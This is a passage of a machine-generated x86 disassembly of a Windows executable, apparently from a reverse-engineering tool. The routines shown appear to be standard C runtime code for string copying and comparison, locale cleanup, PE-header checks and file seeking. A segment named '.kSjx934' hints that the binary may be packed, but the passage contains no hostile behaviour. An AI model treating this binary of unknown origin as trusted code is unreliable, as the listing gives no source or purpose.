pop ebx
mov ecx, [ebp+var_4]
xor ecx, ebp
call sub_402710
leave
retn
sub_40C33C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C4F4 proc near ; CODE XREF: sub_404816+96�p
; sub_40CA44+83�p
var_10 = byte ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 10h
push [ebp+arg_0]
lea ecx, [ebp+var_10]
call sub_40271F
push [ebp+arg_1C]
lea ecx, [ebp+var_10]
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
call sub_40C33C
add esp, 1Ch
cmp [ebp+var_4], 0
jz short locret_40C532
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
locret_40C532: ; CODE XREF: sub_40C4F4+35�j
leave
retn
sub_40C4F4 endp
; =============== S U B R O U T I N E =======================================
sub_40C534 proc near ; CODE XREF: sub_404E21+E9�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz loc_40C6C2
push dword ptr [esi+4]
call sub_403603
push dword ptr [esi+8]
call sub_403603
push dword ptr [esi+0Ch]
call sub_403603
push dword ptr [esi+10h]
call sub_403603
push dword ptr [esi+14h]
call sub_403603
push dword ptr [esi+18h]
call sub_403603
push dword ptr [esi]
call sub_403603
push dword ptr [esi+20h]
call sub_403603
push dword ptr [esi+24h]
call sub_403603
push dword ptr [esi+28h]
call sub_403603
push dword ptr [esi+2Ch]
call sub_403603
push dword ptr [esi+30h]
call sub_403603
push dword ptr [esi+34h]
call sub_403603
push dword ptr [esi+1Ch]
call sub_403603
push dword ptr [esi+38h]
call sub_403603
push dword ptr [esi+3Ch]
call sub_403603
add esp, 40h
push dword ptr [esi+40h]
call sub_403603
push dword ptr [esi+44h]
call sub_403603
push dword ptr [esi+48h]
call sub_403603
push dword ptr [esi+4Ch]
call sub_403603
push dword ptr [esi+50h]
call sub_403603
push dword ptr [esi+54h]
call sub_403603
push dword ptr [esi+58h]
call sub_403603
push dword ptr [esi+5Ch]
call sub_403603
push dword ptr [esi+60h]
call sub_403603
push dword ptr [esi+64h]
call sub_403603
push dword ptr [esi+68h]
call sub_403603
push dword ptr [esi+6Ch]
call sub_403603
push dword ptr [esi+70h]
call sub_403603
push dword ptr [esi+74h]
call sub_403603
push dword ptr [esi+78h]
call sub_403603
push dword ptr [esi+7Ch]
call sub_403603
add esp, 40h
push dword ptr [esi+80h]
call sub_403603
push dword ptr [esi+84h]
call sub_403603
push dword ptr [esi+88h]
call sub_403603
push dword ptr [esi+8Ch]
call sub_403603
push dword ptr [esi+90h]
call sub_403603
push dword ptr [esi+94h]
call sub_403603
push dword ptr [esi+98h]
call sub_403603
push dword ptr [esi+9Ch]
call sub_403603
push dword ptr [esi+0A0h]
call sub_403603
push dword ptr [esi+0A4h]
call sub_403603
push dword ptr [esi+0A8h]
call sub_403603
add esp, 2Ch
loc_40C6C2: ; CODE XREF: sub_40C534+7�j
pop esi
retn
sub_40C534 endp
; =============== S U B R O U T I N E =======================================
sub_40C6C4 proc near ; CODE XREF: sub_404E21+64�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_40C702
mov eax, [esi]
cmp eax, ds:off_423F38
jz short loc_40C6DE
push eax
call sub_403603
pop ecx
loc_40C6DE: ; CODE XREF: sub_40C6C4+11�j
mov eax, [esi+4]
cmp eax, ds:off_423F3C
jz short loc_40C6F0
push eax
call sub_403603
pop ecx
loc_40C6F0: ; CODE XREF: sub_40C6C4+23�j
mov esi, [esi+8]
cmp esi, ds:off_423F40
jz short loc_40C702
push esi
call sub_403603
pop ecx
loc_40C702: ; CODE XREF: sub_40C6C4+7�j
; sub_40C6C4+35�j
pop esi
retn
sub_40C6C4 endp
; =============== S U B R O U T I N E =======================================
sub_40C704 proc near ; CODE XREF: sub_404E21+43�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_40C78B
mov eax, [esi+0Ch]
cmp eax, ds:off_423F44
jz short loc_40C71F
push eax
call sub_403603
pop ecx
loc_40C71F: ; CODE XREF: sub_40C704+12�j
mov eax, [esi+10h]
cmp eax, ds:off_423F48
jz short loc_40C731
push eax
call sub_403603
pop ecx
loc_40C731: ; CODE XREF: sub_40C704+24�j
mov eax, [esi+14h]
cmp eax, ds:off_423F4C
jz short loc_40C743
push eax
call sub_403603
pop ecx
loc_40C743: ; CODE XREF: sub_40C704+36�j
mov eax, [esi+18h]
cmp eax, ds:off_423F50
jz short loc_40C755
push eax
call sub_403603
pop ecx
loc_40C755: ; CODE XREF: sub_40C704+48�j
mov eax, [esi+1Ch]
cmp eax, ds:off_423F54
jz short loc_40C767
push eax
call sub_403603
pop ecx
loc_40C767: ; CODE XREF: sub_40C704+5A�j
mov eax, [esi+20h]
cmp eax, ds:off_423F58
jz short loc_40C779
push eax
call sub_403603
pop ecx
loc_40C779: ; CODE XREF: sub_40C704+6C�j
mov esi, [esi+24h]
cmp esi, ds:off_423F5C
jz short loc_40C78B
push esi
call sub_403603
pop ecx
loc_40C78B: ; CODE XREF: sub_40C704+7�j
; sub_40C704+7E�j
pop esi
retn
sub_40C704 endp
; =============== S U B R O U T I N E =======================================
sub_40C78D proc near ; CODE XREF: sub_409AB4+117�p
; sub_409AB4+139�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_0]
push ebx
xor ebx, ebx
cmp eax, ebx
push esi
push edi
jz short loc_40C7A2
mov edi, [esp+0Ch+arg_4]
cmp edi, ebx
ja short loc_40C7BD
loc_40C7A2: ; CODE XREF: sub_40C78D+B�j
; sub_40C78D+3A�j
call sub_4057D3
push 16h
pop esi
mov [eax], esi
loc_40C7AC: ; CODE XREF: sub_40C78D+69�j
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_402F39
add esp, 14h
mov eax, esi
jmp short loc_40C7FA
; ---------------------------------------------------------------------------
loc_40C7BD: ; CODE XREF: sub_40C78D+13�j
mov esi, [esp+0Ch+arg_8]
cmp esi, ebx
jnz short loc_40C7C9
loc_40C7C5: ; CODE XREF: sub_40C78D+48�j
mov [eax], bl
jmp short loc_40C7A2
; ---------------------------------------------------------------------------
loc_40C7C9: ; CODE XREF: sub_40C78D+36�j
mov edx, eax
loc_40C7CB: ; CODE XREF: sub_40C78D+44�j
cmp [edx], bl
jz short loc_40C7D3
inc edx
dec edi
jnz short loc_40C7CB
loc_40C7D3: ; CODE XREF: sub_40C78D+40�j
cmp edi, ebx
jz short loc_40C7C5
loc_40C7D7: ; CODE XREF: sub_40C78D+55�j
mov cl, [esi]
mov [edx], cl
inc edx
inc esi
cmp cl, bl
jz short loc_40C7E4
dec edi
jnz short loc_40C7D7
loc_40C7E4: ; CODE XREF: sub_40C78D+52�j
cmp edi, ebx
jnz short loc_40C7F8
mov [eax], bl
call sub_4057D3
push 22h
pop ecx
mov [eax], ecx
mov esi, ecx
jmp short loc_40C7AC
; ---------------------------------------------------------------------------
loc_40C7F8: ; CODE XREF: sub_40C78D+59�j
xor eax, eax
loc_40C7FA: ; CODE XREF: sub_40C78D+2E�j
pop edi
pop esi
pop ebx
retn
sub_40C78D endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push esi
xor eax, eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
mov edx, [ebp+0Ch]
lea ecx, [ecx+0]
loc_40C814: ; CODE XREF: .kSjx934:0040C821�j
mov al, [edx]
or al, al
jz short loc_40C823
add edx, 1
bts [esp], eax
jmp short loc_40C814
; ---------------------------------------------------------------------------
loc_40C823: ; CODE XREF: .kSjx934:0040C818�j
mov esi, [ebp+8]
or ecx, 0FFFFFFFFh
lea ecx, [ecx+0]
loc_40C82C: ; CODE XREF: .kSjx934:0040C83C�j
add ecx, 1
mov al, [esi]
or al, al
jz short loc_40C83E
add esi, 1
bt [esp], eax
jnb short loc_40C82C
loc_40C83E: ; CODE XREF: .kSjx934:0040C833�j
mov eax, ecx
add esp, 20h
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C846 proc near ; CODE XREF: sub_409AB4+F1�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_0]
xor ebx, ebx
cmp [ebp+arg_C], ebx
push edi
jnz short loc_40C866
cmp esi, ebx
jnz short loc_40C86A
cmp [ebp+arg_4], ebx
jnz short loc_40C871
loc_40C85F: ; CODE XREF: sub_40C846+4D�j
; sub_40C846+8C�j
xor eax, eax
loc_40C861: ; CODE XREF: sub_40C846+44�j
; sub_40C846+9E�j
pop edi
pop esi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40C866: ; CODE XREF: sub_40C846+E�j
cmp esi, ebx
jz short loc_40C871
loc_40C86A: ; CODE XREF: sub_40C846+12�j
mov edi, [ebp+arg_4]
cmp edi, ebx
ja short loc_40C88C
loc_40C871: ; CODE XREF: sub_40C846+17�j
; sub_40C846+22�j ...
call sub_4057D3
push 16h
pop esi
mov [eax], esi
loc_40C87B: ; CODE XREF: sub_40C846+B1�j
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_402F39
add esp, 14h
mov eax, esi
jmp short loc_40C861
; ---------------------------------------------------------------------------
loc_40C88C: ; CODE XREF: sub_40C846+29�j
cmp [ebp+arg_C], ebx
jnz short loc_40C895
mov [esi], bl
jmp short loc_40C85F
; ---------------------------------------------------------------------------
loc_40C895: ; CODE XREF: sub_40C846+49�j
mov edx, [ebp+arg_8]
cmp edx, ebx
jnz short loc_40C8A0
mov [esi], bl
jmp short loc_40C871
; ---------------------------------------------------------------------------
loc_40C8A0: ; CODE XREF: sub_40C846+54�j
cmp [ebp+arg_C], 0FFFFFFFFh
mov eax, esi
jnz short loc_40C8B7
loc_40C8A8: ; CODE XREF: sub_40C846+6D�j
mov cl, [edx]
mov [eax], cl
inc eax
inc edx
cmp cl, bl
jz short loc_40C8D0
dec edi
jnz short loc_40C8A8
jmp short loc_40C8D0
; ---------------------------------------------------------------------------
loc_40C8B7: ; CODE XREF: sub_40C846+60�j
; sub_40C846+81�j
mov cl, [edx]
mov [eax], cl
inc eax
inc edx
cmp cl, bl
jz short loc_40C8C9
dec edi
jz short loc_40C8C9
dec [ebp+arg_C]
jnz short loc_40C8B7
loc_40C8C9: ; CODE XREF: sub_40C846+79�j
; sub_40C846+7C�j
cmp [ebp+arg_C], ebx
jnz short loc_40C8D0
mov [eax], bl
loc_40C8D0: ; CODE XREF: sub_40C846+6A�j
; sub_40C846+6F�j ...
cmp edi, ebx
jnz short loc_40C85F
cmp [ebp+arg_C], 0FFFFFFFFh
jnz short loc_40C8E9
mov eax, [ebp+arg_4]
push 50h
mov [esi+eax-1], bl
pop eax
jmp loc_40C861
; ---------------------------------------------------------------------------
loc_40C8E9: ; CODE XREF: sub_40C846+92�j
mov [esi], bl
call sub_4057D3
push 22h
pop ecx
mov [eax], ecx
mov esi, ecx
jmp short loc_40C87B
sub_40C846 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C8F9 proc near ; CODE XREF: sub_40E9C7+32�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push ebx
mov ebx, [ebp+arg_8]
test ebx, ebx
jnz short loc_40C910
xor eax, eax
jmp loc_40C9AA
; ---------------------------------------------------------------------------
loc_40C910: ; CODE XREF: sub_40C8F9+E�j
cmp ebx, 4
push edi
jb short loc_40C98B
lea edi, [ebx-4]
test edi, edi
jbe short loc_40C98B
mov ecx, [ebp+arg_4]
mov eax, [ebp+arg_0]
loc_40C923: ; CODE XREF: sub_40C8F9+66�j
mov dl, [eax]
add eax, 4
add ecx, 4
test dl, dl
jz short loc_40C981
cmp dl, [ecx-4]
jnz short loc_40C981
mov dl, [eax-3]
test dl, dl
jz short loc_40C977
cmp dl, [ecx-3]
jnz short loc_40C977
mov dl, [eax-2]
test dl, dl
jz short loc_40C96D
cmp dl, [ecx-2]
jnz short loc_40C96D
mov dl, [eax-1]
test dl, dl
jz short loc_40C963
cmp dl, [ecx-1]
jnz short loc_40C963
add [ebp+var_4], 4
cmp [ebp+var_4], edi
jb short loc_40C923
jmp short loc_40C9A2
; ---------------------------------------------------------------------------
loc_40C963: ; CODE XREF: sub_40C8F9+58�j
; sub_40C8F9+5D�j
movzx eax, byte ptr [eax-1]
movzx ecx, byte ptr [ecx-1]
jmp short loc_40C9B3
; ---------------------------------------------------------------------------
loc_40C96D: ; CODE XREF: sub_40C8F9+4C�j
; sub_40C8F9+51�j
movzx eax, byte ptr [eax-2]
movzx ecx, byte ptr [ecx-2]
jmp short loc_40C9B3
; ---------------------------------------------------------------------------
loc_40C977: ; CODE XREF: sub_40C8F9+40�j
; sub_40C8F9+45�j
movzx eax, byte ptr [eax-3]
movzx ecx, byte ptr [ecx-3]
jmp short loc_40C9B3
; ---------------------------------------------------------------------------
loc_40C981: ; CODE XREF: sub_40C8F9+34�j
; sub_40C8F9+39�j
movzx eax, byte ptr [eax-4]
movzx ecx, byte ptr [ecx-4]
jmp short loc_40C9B3
; ---------------------------------------------------------------------------
loc_40C98B: ; CODE XREF: sub_40C8F9+1B�j
; sub_40C8F9+22�j
mov ecx, [ebp+arg_4]
mov eax, [ebp+arg_0]
jmp short loc_40C9A2
; ---------------------------------------------------------------------------
loc_40C993: ; CODE XREF: sub_40C8F9+AC�j
mov dl, [eax]
test dl, dl
jz short loc_40C9AD
cmp dl, [ecx]
jnz short loc_40C9AD
inc eax
inc ecx
inc [ebp+var_4]
loc_40C9A2: ; CODE XREF: sub_40C8F9+68�j
; sub_40C8F9+98�j
cmp [ebp+var_4], ebx
jb short loc_40C993
xor eax, eax
loc_40C9A9: ; CODE XREF: sub_40C8F9+BC�j
pop edi
loc_40C9AA: ; CODE XREF: sub_40C8F9+12�j
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_40C9AD: ; CODE XREF: sub_40C8F9+9E�j
; sub_40C8F9+A2�j
movzx eax, byte ptr [eax]
movzx ecx, byte ptr [ecx]
loc_40C9B3: ; CODE XREF: sub_40C8F9+72�j
; sub_40C8F9+7C�j ...
sub eax, ecx
jmp short loc_40C9A9
sub_40C8F9 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push esi
xor eax, eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
mov edx, [ebp+0Ch]
lea ecx, [ecx+0]
loc_40C9D4: ; CODE XREF: .kSjx934:0040C9E1�j
mov al, [edx]
or al, al
jz short loc_40C9E3
add edx, 1
bts [esp], eax
jmp short loc_40C9D4
; ---------------------------------------------------------------------------
loc_40C9E3: ; CODE XREF: .kSjx934:0040C9D8�j
mov esi, [ebp+8]
mov edi, edi
loc_40C9E8: ; CODE XREF: .kSjx934:0040C9F5�j
mov al, [esi]
or al, al
jz short loc_40C9FA
add esi, 1
bt [esp], eax
jnb short loc_40C9E8
lea eax, [esi-1]
loc_40C9FA: ; CODE XREF: .kSjx934:0040C9EC�j
add esp, 20h
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CA00 proc near ; CODE XREF: sub_40565A+93�p
; sub_4069D7+34D�p ...
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push [ebp+arg_4]
lea ecx, [ebp+var_10]
call sub_40271F
movzx eax, [ebp+arg_0]
mov ecx, [ebp+var_10]
mov ecx, [ecx+0C8h]
movzx eax, word ptr [ecx+eax*2]
and eax, 8000h
cmp [ebp+var_4], 0
jz short locret_40CA34
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
locret_40CA34: ; CODE XREF: sub_40CA00+2B�j
leave
retn
sub_40CA00 endp
; =============== S U B R O U T I N E =======================================
sub_40CA36 proc near ; CODE XREF: .kSjx934:00409532�p
; .kSjx934:004099EC�p ...
arg_0 = dword ptr 4
push 0
push [esp+4+arg_0]
call sub_40CA00
pop ecx
pop ecx
retn
sub_40CA36 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CA44 proc near ; CODE XREF: sub_40565A+32�p
; sub_40A7C0+81�p ...
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = byte ptr -8
var_7 = byte ptr -7
var_6 = byte ptr -6
var_4 = word ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push [ebp+arg_8]
lea ecx, [ebp+var_18]
call sub_40271F
mov ebx, [ebp+arg_0]
lea eax, [ebx+1]
cmp eax, 100h
ja short loc_40CA72
mov eax, [ebp+var_18]
mov eax, [eax+0C8h]
movzx eax, word ptr [eax+ebx*2]
jmp short loc_40CAE7
; ---------------------------------------------------------------------------
loc_40CA72: ; CODE XREF: sub_40CA44+1D�j
mov [ebp+arg_0], ebx
sar [ebp+arg_0], 8
lea eax, [ebp+var_18]
push eax
mov eax, [ebp+arg_0]
and eax, 0FFh
push eax
call sub_40CA00
test eax, eax
pop ecx
pop ecx
jz short loc_40CAA3
mov al, byte ptr [ebp+arg_0]
push 2
mov [ebp+var_8], al
mov [ebp+var_7], bl
mov [ebp+var_6], 0
pop ecx
jmp short loc_40CAAD
; ---------------------------------------------------------------------------
loc_40CAA3: ; CODE XREF: sub_40CA44+4B�j
xor ecx, ecx
mov [ebp+var_8], bl
mov [ebp+var_7], 0
inc ecx
loc_40CAAD: ; CODE XREF: sub_40CA44+5D�j
mov eax, [ebp+var_18]
push 1
push dword ptr [eax+14h]
push dword ptr [eax+4]
lea eax, [ebp+var_4]
push eax
push ecx
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_18]
push 1
push eax
call sub_40C4F4
add esp, 20h
test eax, eax
jnz short loc_40CAE3
cmp [ebp+var_C], al
jz short loc_40CADF
mov eax, [ebp+var_10]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_40CADF: ; CODE XREF: sub_40CA44+92�j
xor eax, eax
jmp short loc_40CAF7
; ---------------------------------------------------------------------------
loc_40CAE3: ; CODE XREF: sub_40CA44+8D�j
movzx eax, [ebp+var_4]
loc_40CAE7: ; CODE XREF: sub_40CA44+2C�j
and eax, [ebp+arg_4]
cmp [ebp+var_C], 0
jz short loc_40CAF7
mov ecx, [ebp+var_10]
and dword ptr [ecx+70h], 0FFFFFFFDh
loc_40CAF7: ; CODE XREF: sub_40CA44+9D�j
; sub_40CA44+AA�j
pop ebx
leave
retn
sub_40CA44 endp
; =============== S U B R O U T I N E =======================================
sub_40CAFA proc near ; CODE XREF: sub_407B19+F�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ds:dword_42641C, eax
retn
sub_40CAFA endp
; ---------------------------------------------------------------------------
loc_40CB04: ; DATA XREF: sub_40CB14:loc_40CB79�o
push dword ptr [esp+4]
call ds:dword_41D120
xor eax, eax
inc eax
retn 8
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CB14 proc near ; CODE XREF: sub_405881+26�p
; sub_405934+78�p ...
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push 14h
push offset dword_421760
call __SEH_prolog4
xor edi, edi
mov [ebp+var_1C], edi
push ds:dword_42641C
call sub_405193
pop ecx
mov esi, eax
cmp esi, edi
jnz short loc_40CB8A
lea eax, [ebp+var_1C]
push eax
call sub_407906
pop ecx
cmp eax, edi
jz short loc_40CB52
push edi
push edi
push edi
push edi
push edi
call sub_402E3D
add esp, 14h
loc_40CB52: ; CODE XREF: sub_40CB14+2F�j
cmp [ebp+var_1C], 1
jz short loc_40CB79
push offset aKernel32_dl_10 ; "kernel32.dll"
call ds:dword_41D0E4
cmp eax, edi
jz short loc_40CB79
push offset aInitializecrit ; "InitializeCriticalSectionAndSpinCount"
push eax
call ds:dword_41D0EC
mov esi, eax
cmp esi, edi
jnz short loc_40CB7E
loc_40CB79: ; CODE XREF: sub_40CB14+42�j
; sub_40CB14+51�j
mov esi, offset loc_40CB04
loc_40CB7E: ; CODE XREF: sub_40CB14+63�j
push esi
call sub_405127
pop ecx
mov ds:dword_42641C, eax
loc_40CB8A: ; CODE XREF: sub_40CB14+21�j
mov [ebp+ms_exc.disabled], edi
push [ebp+arg_4]
push [ebp+arg_0]
call esi
mov [ebp+var_20], eax
jmp short loc_40CBC9
; ---------------------------------------------------------------------------
mov eax, [ebp+ms_exc.exc_ptr]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_24], eax
xor ecx, ecx
cmp eax, 0C0000017h
setz cl
mov eax, ecx
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+ms_exc.old_esp]
cmp [ebp+var_24], 0C0000017h
jnz short loc_40CBC5
push 8
call ds:dword_41D174
loc_40CBC5: ; CODE XREF: sub_40CB14+A7�j
and [ebp+var_20], 0
loc_40CBC9: ; CODE XREF: sub_40CB14+84�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
mov eax, [ebp+var_20]
call __SEH_epilog4
retn
sub_40CB14 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40CBE0 proc near ; CODE XREF: sub_40CC52+16�p
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
cmp word ptr [ecx], 5A4Dh
jz short loc_40CBEE
loc_40CBEB: ; CODE XREF: sub_40CBE0+19�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_40CBEE: ; CODE XREF: sub_40CBE0+9�j
mov eax, [ecx+3Ch]
add eax, ecx
cmp dword ptr [eax], 4550h
jnz short loc_40CBEB
xor ecx, ecx
cmp word ptr [eax+18h], 10Bh
setz cl
mov eax, ecx
retn
sub_40CBE0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40CC10 proc near ; CODE XREF: sub_40CC52+27�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
mov ecx, [eax+3Ch]
add ecx, eax
movzx eax, word ptr [ecx+14h]
push ebx
push esi
movzx esi, word ptr [ecx+6]
xor edx, edx
test esi, esi
push edi
lea eax, [eax+ecx+18h]
jbe short loc_40CC4C
mov edi, [esp+0Ch+arg_4]
loc_40CC32: ; CODE XREF: sub_40CC10+3A�j
mov ecx, [eax+0Ch]
cmp edi, ecx
jb short loc_40CC42
mov ebx, [eax+8]
add ebx, ecx
cmp edi, ebx
jb short loc_40CC4E
loc_40CC42: ; CODE XREF: sub_40CC10+27�j
add edx, 1
add eax, 28h
cmp edx, esi
jb short loc_40CC32
loc_40CC4C: ; CODE XREF: sub_40CC10+1C�j
xor eax, eax
loc_40CC4E: ; CODE XREF: sub_40CC10+30�j
pop edi
pop esi
pop ebx
retn
sub_40CC10 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CC52 proc near ; CODE XREF: sub_406640+FF�p
; sub_407979+E�p ...
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 8
push offset dword_421780
call __SEH_prolog4
and [ebp+ms_exc.disabled], 0
mov edx, 400000h
push edx
call sub_40CBE0
pop ecx
test eax, eax
jz short loc_40CCAF
mov eax, [ebp+arg_0]
sub eax, edx
push eax
push edx
call sub_40CC10
pop ecx
pop ecx
test eax, eax
jz short loc_40CCAF
mov eax, [eax+24h]
shr eax, 1Fh
not eax
and eax, 1
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
jmp short loc_40CCB8
; ---------------------------------------------------------------------------
mov eax, [ebp+ms_exc.exc_ptr]
mov eax, [eax]
mov eax, [eax]
xor ecx, ecx
cmp eax, 0C0000005h
setz cl
mov eax, ecx
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+ms_exc.old_esp]
loc_40CCAF: ; CODE XREF: sub_40CC52+1E�j
; sub_40CC52+30�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
xor eax, eax
loc_40CCB8: ; CODE XREF: sub_40CC52+44�j
call __SEH_epilog4
retn
sub_40CC52 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CCBE proc near ; CODE XREF: sub_409DAD+2EE�p
; sub_409DAD+3C8�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_4]
push esi
mov esi, [ebp+arg_0]
mov [ebp+var_8], eax
mov eax, [ebp+arg_8]
push edi
push esi
mov [ebp+var_4], eax
call sub_40ED7D
or edi, 0FFFFFFFFh
cmp eax, edi
pop ecx
jnz short loc_40CCF3
call sub_4057D3
mov dword ptr [eax], 9
loc_40CCED: ; CODE XREF: sub_40CCBE+5E�j
mov eax, edi
mov edx, edi
jmp short loc_40CD3D
; ---------------------------------------------------------------------------
loc_40CCF3: ; CODE XREF: sub_40CCBE+22�j
push [ebp+arg_C]
lea ecx, [ebp+var_4]
push ecx
push [ebp+var_8]
push eax
call ds:dword_41D074
cmp eax, edi
mov [ebp+var_8], eax
jnz short loc_40CD1E
call ds:dword_41D0F0
test eax, eax
jz short loc_40CD1E
push eax
call sub_4057F9
pop ecx
jmp short loc_40CCED
; ---------------------------------------------------------------------------
loc_40CD1E: ; CODE XREF: sub_40CCBE+4B�j
; sub_40CCBE+55�j
mov eax, esi
and esi, 1Fh
imul esi, 28h
sar eax, 5
mov eax, ds:dword_433CA0[eax*4]
lea eax, [eax+esi+4]
and byte ptr [eax], 0FDh
mov eax, [ebp+var_8]
mov edx, [ebp+var_4]
loc_40CD3D: ; CODE XREF: sub_40CCBE+33�j
pop edi
pop esi
leave
retn
sub_40CCBE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CD41 proc near ; CODE XREF: sub_4067D6+116�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push 14h
push offset dword_4217A0
call __SEH_prolog4
or esi, 0FFFFFFFFh
mov [ebp+var_24], esi
mov [ebp+var_20], esi
mov eax, [ebp+arg_0]
cmp eax, 0FFFFFFFEh
jnz short loc_40CD7A
call sub_4057E6
and dword ptr [eax], 0
call sub_4057D3
mov dword ptr [eax], 9
loc_40CD71: ; CODE XREF: sub_40CD41+66�j
mov eax, esi
mov edx, esi
jmp loc_40CE4A
; ---------------------------------------------------------------------------
loc_40CD7A: ; CODE XREF: sub_40CD41+1B�j
xor edi, edi
cmp eax, edi
jl short loc_40CD88
cmp eax, ds:dword_433C84
jb short loc_40CDA9
loc_40CD88: ; CODE XREF: sub_40CD41+3D�j
call sub_4057E6
mov [eax], edi
call sub_4057D3
mov dword ptr [eax], 9
push edi
push edi
push edi
push edi
push edi
call sub_402F39
add esp, 14h
jmp short loc_40CD71
; ---------------------------------------------------------------------------
loc_40CDA9: ; CODE XREF: sub_40CD41+45�j
mov ecx, eax
sar ecx, 5
lea ebx, ds:433CA0h[ecx*4]
mov esi, eax
and esi, 1Fh
imul esi, 28h
mov ecx, [ebx]
movzx ecx, byte ptr [ecx+esi+4]
and ecx, 1
jnz short loc_40CDEF
call sub_4057E6
mov [eax], edi
call sub_4057D3
mov dword ptr [eax], 9
push edi
push edi
push edi
push edi
push edi
call sub_402F39
add esp, 14h
or edx, 0FFFFFFFFh
mov eax, edx
jmp short loc_40CE4A
; ---------------------------------------------------------------------------
loc_40CDEF: ; CODE XREF: sub_40CD41+86�j
push eax
call sub_40EDEE
pop ecx
mov [ebp+ms_exc.disabled], edi
mov eax, [ebx]
test byte ptr [eax+esi+4], 1
jz short loc_40CE1E
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40CCBE
add esp, 10h
mov [ebp+var_24], eax
mov [ebp+var_20], edx
jmp short loc_40CE38
; ---------------------------------------------------------------------------
loc_40CE1E: ; CODE XREF: sub_40CD41+BF�j
call sub_4057D3
mov dword ptr [eax], 9
call sub_4057E6
mov [eax], edi
or [ebp+var_24], 0FFFFFFFFh
or [ebp+var_20], 0FFFFFFFFh
loc_40CE38: ; CODE XREF: sub_40CD41+DB�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40CE50
mov eax, [ebp+var_24]
mov edx, [ebp+var_20]
loc_40CE4A: ; CODE XREF: sub_40CD41+34�j
; sub_40CD41+AC�j
call __SEH_epilog4
retn
sub_40CD41 endp
; =============== S U B R O U T I N E =======================================
sub_40CE50 proc near ; CODE XREF: sub_40CD41+FE�p
; DATA XREF: .kSjx934:004217B8�o
push dword ptr [ebp+8]
call sub_40EE8E
pop ecx
retn
sub_40CE50 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=518h
